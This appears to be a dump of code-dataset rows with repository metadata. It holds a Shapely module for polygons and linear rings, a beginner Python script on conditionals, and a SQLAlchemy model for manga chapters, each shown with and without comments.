        except TypeError:
            N = exemplar._ndim
        assert L >= 1
        assert N == 2 or N == 3
        # Array of pointers to ring geometries
        geos_holes = (c_void_p * L)()
        # add to coordinate sequence
        for l in xrange(L):
            geom, ndim = geos_linearring_from_py(ob[l])
            geos_holes[l] = cast(geom, c_void_p)
    else:
        # No holes: pass a null pointer and a count of zero.
        geos_holes = POINTER(c_void_p)()
        L = 0
    return (
        lgeos.GEOSGeom_createPolygon(
            c_void_p(geos_shell),
            geos_holes,
            L
        ),
        ndim
    )
# Test runner
def _test():
    """Run this module's doctests."""
    import doctest
    doctest.testmod()
if __name__ == "__main__":
    _test()
| 29.268085
| 81
| 0.557793
|
from ctypes import c_double, c_void_p, cast, POINTER
from ctypes import ArgumentError
import weakref
from shapely.algorithms.cga import signed_area
from shapely.coords import required
from shapely.geos import lgeos
from shapely.geometry.base import BaseGeometry
from shapely.geometry.linestring import LineString, LineStringAdapter
from shapely.geometry.proxy import PolygonProxy
__all__ = ['Polygon', 'asPolygon', 'LinearRing', 'asLinearRing']
class LinearRing(LineString):
def __init__(self, coordinates=None):
BaseGeometry.__init__(self)
if coordinates is not None:
self._set_coords(coordinates)
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
_get_coords = BaseGeometry._get_coords
def _set_coords(self, coordinates):
self.empty()
self._geom, self._ndim = geos_linearring_from_py(coordinates)
coords = property(_get_coords, _set_coords)
@property
def is_ccw(self):
return bool(self.impl['is_ccw'](self))
@property
def is_simple(self):
return LineString(self).is_simple
class LinearRingAdapter(LineStringAdapter):
__p__ = None
def __init__(self, context):
self.context = context
self.factory = geos_linearring_from_py
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
coords = property(BaseGeometry._get_coords)
def asLinearRing(context):
return LinearRingAdapter(context)
class InteriorRingSequence(object):
_factory = None
_geom = None
__p__ = None
_ndim = None
_index = 0
_length = 0
__rings__ = None
_gtag = None
def __init__(self, parent):
self.__p__ = parent
self._geom = parent._geom
self._ndim = parent._ndim
def __iter__(self):
self._index = 0
self._length = self.__len__()
return self
def next(self):
if self._index < self._length:
ring = self._get_ring(self._index)
self._index += 1
return ring
else:
raise StopIteration
def __len__(self):
return lgeos.GEOSGetNumInteriorRings(self._geom)
def __getitem__(self, key):
m = self.__len__()
if isinstance(key, int):
if key + m < 0 or key >= m:
raise IndexError("index out of range")
if key < 0:
i = m + key
else:
i = key
return self._get_ring(i)
elif isinstance(key, slice):
res = []
start, stop, stride = key.indices(m)
for i in xrange(start, stop, stride):
res.append(self._get_ring(i))
return res
else:
raise TypeError("key must be an index or slice")
@property
def _longest(self):
max = 0
for g in iter(self):
l = len(g.coords)
if l > max:
max = l
def gtag(self):
return hash(repr(self.__p__))
def _get_ring(self, i):
gtag = self.gtag()
if gtag != self._gtag:
self.__rings__ = {}
if i not in self.__rings__:
g = lgeos.GEOSGetInteriorRingN(self._geom, i)
ring = LinearRing()
ring.__geom__ = g
ring.__p__ = self
ring._owned = True
ring._ndim = self._ndim
self.__rings__[i] = weakref.ref(ring)
return self.__rings__[i]()
class Polygon(BaseGeometry):
_exterior = None
_interiors = []
_ndim = 2
def __init__(self, shell=None, holes=None):
BaseGeometry.__init__(self)
if shell is not None:
self._geom, self._ndim = geos_polygon_from_py(shell, holes)
@property
def exterior(self):
if self.is_empty:
return None
elif self._exterior is None or self._exterior() is None:
g = lgeos.GEOSGetExteriorRing(self._geom)
ring = LinearRing()
ring.__geom__ = g
ring.__p__ = self
ring._owned = True
ring._ndim = self._ndim
self._exterior = weakref.ref(ring)
return self._exterior()
@property
def interiors(self):
if self.is_empty:
return []
return InteriorRingSequence(self)
@property
def ctypes(self):
if not self._ctypes_data:
self._ctypes_data = self.exterior.ctypes
return self._ctypes_data
@property
def __array_interface__(self):
raise NotImplementedError(
"A polygon does not itself provide the array interface. Its rings do.")
def _get_coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
def _set_coords(self, ob):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def __geo_interface__(self):
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {
'type': 'Polygon',
'coordinates': tuple(coords)
}
class PolygonAdapter(PolygonProxy, Polygon):
def __init__(self, shell, holes=None):
self.shell = shell
self.holes = holes
self.context = (shell, holes)
self.factory = geos_polygon_from_py
@property
def _ndim(self):
try:
array = self.shell.__array_interface__
n = array['shape'][1]
assert n == 2 or n == 3
return n
except AttributeError:
return len(self.shell[0])
def asPolygon(shell, holes=None):
return PolygonAdapter(shell, holes)
def orient(polygon, sign=1.0):
s = float(sign)
rings = []
ring = polygon.exterior
if signed_area(ring)/s >= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
for ring in polygon.interiors:
if signed_area(ring)/s <= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
return Polygon(rings[0], rings[1:])
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
ob = required(ob)
try:
array = ob.__array_interface__
assert len(array['shape']) == 2
m = array['shape'][0]
n = array['shape'][1]
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert n == 2 or n == 3
if isinstance(array['data'], tuple):
cp = cast(array['data'][0], POINTER(c_double))
else:
cp = array['data']
if cp[0] != cp[m*n-n] or cp[1] != cp[m*n-n+1]:
M = m + 1
else:
M = m
if update_geom is not None:
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
if n != update_ndim:
raise ValueError(
"Wrong coordinate dimensions; this geometry has dimensions: %d" \
% update_ndim)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
for i in xrange(m):
lgeos.GEOSCoordSeq_setX(cs, i, cp[n*i])
lgeos.GEOSCoordSeq_setY(cs, i, cp[n*i+1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, i, cp[n*i+2])
if M > m:
lgeos.GEOSCoordSeq_setX(cs, M-1, cp[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, cp[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, cp[2])
except AttributeError:
m = len(ob)
n = len(ob[0])
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert (n == 2 or n == 3)
if m == 3 or ob[0][0] != ob[-1][0] or ob[0][1] != ob[-1][1]:
M = m + 1
else:
M = m
if update_geom is not None:
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
if n != update_ndim:
raise ValueError(
"Wrong coordinate dimensions; this geometry has dimensions: %d" \
% update_ndim)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
for i in xrange(m):
coords = ob[i]
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
if M > m:
coords = ob[0]
lgeos.GEOSCoordSeq_setX(cs, M-1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
def update_linearring_from_py(geom, ob):
geos_linearring_from_py(ob, geom._geom, geom._ndim)
def geos_polygon_from_py(shell, holes=None):
if shell is not None:
geos_shell, ndim = geos_linearring_from_py(shell)
if holes:
ob = holes
L = len(ob)
exemplar = ob[0]
try:
N = len(exemplar[0])
except TypeError:
N = exemplar._ndim
assert L >= 1
assert N == 2 or N == 3
geos_holes = (c_void_p * L)()
for l in xrange(L):
geom, ndim = geos_linearring_from_py(ob[l])
geos_holes[l] = cast(geom, c_void_p)
else:
geos_holes = POINTER(c_void_p)()
L = 0
return (
lgeos.GEOSGeom_createPolygon(
c_void_p(geos_shell),
geos_holes,
L
),
ndim
)
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
| true
| true
|
f70541d9d771fb542f9dab03839544e3d44ed928
| 658
|
py
|
Python
|
TryAPP1.0/condition.py
|
deepankur797/random
|
fc7a1ac60d9de08c79bc5f5676705e45531ce6d9
|
[
"MIT"
] | null | null | null |
TryAPP1.0/condition.py
|
deepankur797/random
|
fc7a1ac60d9de08c79bc5f5676705e45531ce6d9
|
[
"MIT"
] | null | null | null |
TryAPP1.0/condition.py
|
deepankur797/random
|
fc7a1ac60d9de08c79bc5f5676705e45531ce6d9
|
[
"MIT"
] | null | null | null |
x = 2
# Comparison expressions evaluate directly to booleans.
print(x == 2)
print(x == 3)
print(x < 3)
# Boolean operators combine conditions.
name = "John"
age = 23
if name == "John" and age == 23:
    print("Your name is John, and you are also 23 years old.")
if name == "John" or name == "Rick":
    print("Your name is either John or Rick.")
# The "in" operator checks whether a value exists inside an iterable
# container, such as a list.
mylist = ["John", "Rick"]
if name in mylist:
    print("You are here with us")
# if/elif/else chain in Python.
x = 3
if x == 2:
    print("x is 2")
elif x == 3:
    print("x is 3")
else:
    print("value doesnot match")
| 20.5625
| 124
| 0.612462
|
x=2
print(x == 2)
print(x == 3)
print(x<3)
name = "John"
age = 23
if name == "John" and age == 23:
print("Your name is John, and you are also 23 years old.")
if name == "John" or name == "Rick":
print("Your name is either John or Rick.")
mylist=["John","Rick"]
if name in mylist:
print("You are here with us")
x=3
if(x==2):
print("x is 2")
elif(x==3):
print("x is 3")
else:
print("value doesnot match")
| true
| true
|
f7054235a1553c55fbb86f3ddd8de322b7a8e454
| 1,157
|
py
|
Python
|
mangaloid_instance/storage/models/chapter.py
|
compscifag/instance
|
449217abcab48cf3bbbb99ed2be9fcfacf2fa92f
|
[
"MIT"
] | null | null | null |
mangaloid_instance/storage/models/chapter.py
|
compscifag/instance
|
449217abcab48cf3bbbb99ed2be9fcfacf2fa92f
|
[
"MIT"
] | null | null | null |
mangaloid_instance/storage/models/chapter.py
|
compscifag/instance
|
449217abcab48cf3bbbb99ed2be9fcfacf2fa92f
|
[
"MIT"
] | null | null | null |
from . import Base
from sqlalchemy import Column, Integer, Text, DateTime, ForeignKey
from datetime import datetime
class Chapter(Base):
    """SQLAlchemy model for a single manga chapter."""
    __tablename__ = "chapters"
    id = Column(Integer, primary_key=True, autoincrement=True)
    # Owning manga (foreign key into the `manga` table).
    manga_id = Column(Integer, ForeignKey("manga.id"))
    chapter_no = Column(Integer)
    # Optional textual suffix appended to the chapter number.
    chapter_postfix = Column(Text)
    # Position of the chapter within the manga's reading order.
    ordinal = Column(Integer)
    page_count = Column(Integer)
    title = Column(Text)
    version = Column(Integer)
    language_id = Column(Text)
    # Identifier of the scanlation/release group.
    group_id = Column(Integer)
    date_added = Column(DateTime)
    # IPFS address of the chapter's content.
    ipfs_link = Column(Text)
    def to_dict(self):
        """Serialize to a plain dict; `date_added` becomes a Unix timestamp."""
        return {
            "id" : self.id,
            "manga_id" : self.manga_id,
            "chapter_no" : self.chapter_no,
            "chapter_postfix" : self.chapter_postfix,
            "ordinal" : self.ordinal,
            "title" : self.title,
            "page_count" : self.page_count,
            "version" : self.version,
            "language_id" : self.language_id,
            "group_id" : self.group_id,
            "date_added" : int(self.date_added.timestamp()),
            "ipfs_link" : self.ipfs_link
        }
| 33.057143
| 66
| 0.615385
|
from . import Base
from sqlalchemy import Column, Integer, Text, DateTime, ForeignKey
from datetime import datetime
class Chapter(Base):
__tablename__ = "chapters"
id = Column(Integer, primary_key=True, autoincrement=True)
manga_id = Column(Integer, ForeignKey("manga.id"))
chapter_no = Column(Integer)
chapter_postfix = Column(Text)
ordinal = Column(Integer)
page_count = Column(Integer)
title = Column(Text)
version = Column(Integer)
language_id = Column(Text)
group_id = Column(Integer)
date_added = Column(DateTime)
ipfs_link = Column(Text)
def to_dict(self):
return {
"id" : self.id,
"manga_id" : self.manga_id,
"chapter_no" : self.chapter_no,
"chapter_postfix" : self.chapter_postfix,
"ordinal" : self.ordinal,
"title" : self.title,
"page_count" : self.page_count,
"version" : self.version,
"language_id" : self.language_id,
"group_id" : self.group_id,
"date_added" : int(self.date_added.timestamp()),
"ipfs_link" : self.ipfs_link
}
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.